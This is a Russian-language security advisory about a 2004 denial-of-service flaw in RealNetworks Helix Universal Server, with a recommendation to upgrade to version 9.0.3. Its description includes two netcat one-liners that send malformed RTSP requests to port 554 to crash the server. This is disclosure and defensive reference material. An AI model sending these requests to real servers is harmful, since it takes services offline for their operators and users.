Security Lab

Отказ в обслуживании при обработке URL в RealNetworks Helix Universal Server

Дата публикации:18.04.2004
Дата изменения:17.10.2006
Всего просмотров:1114
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: RealNetworks Helix Universal Server до версии 9.0.3

Описание: Уязвимость обнаружена в RealNetworks Helix Universal Server. Удаленный пользователь может аварийно завершить работу службы.

Удаленный пользователь может представить специально обработанный HTTP GET запрос, чтобы вызвать ссылку на нулевой указатель, чтобы аварийно завершить работу сервера. Пример:

$ echo -e "GET_PARAMETER / RTSP/1.0\n\n" | nc -v localhost 554
$ echo -e "DESCRIBE / RTSP/1.0\nSession:\n\n" | nc -v localhost 554
Если установлены опции '--no-crash-avoidance' и '--no-auto-restart', сервер аварийно завершит свою работу и не будет перезагружен.

URL производителя:http://www.realnetworks.com/products/server/

Решение:Установите обновленную версию программы (9.0.3)

Ссылки: iDEFENSE Security Advisory 04.15.04: RealNetworks Helix Universal